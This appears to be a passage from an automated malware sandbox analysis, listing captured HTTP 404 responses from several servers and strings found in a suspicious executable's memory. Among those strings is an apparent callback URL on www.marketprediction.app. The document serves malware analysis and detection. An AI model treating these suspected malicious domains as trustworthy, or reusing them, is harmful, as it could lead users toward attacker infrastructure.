72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 15:00:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 15:00:54 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 15:00:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:01:03 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:01:05 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:01:08 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:01:11 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:01:59 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:02:01 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:02:04 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:02:06 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:02:12 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:02:14 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:02:17 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:02:20 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000004C1A000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.000000000428A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3877376755.0000000006824000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.marketprediction.app
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3877376755.0000000006824000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.marketprediction.app/ucmb/
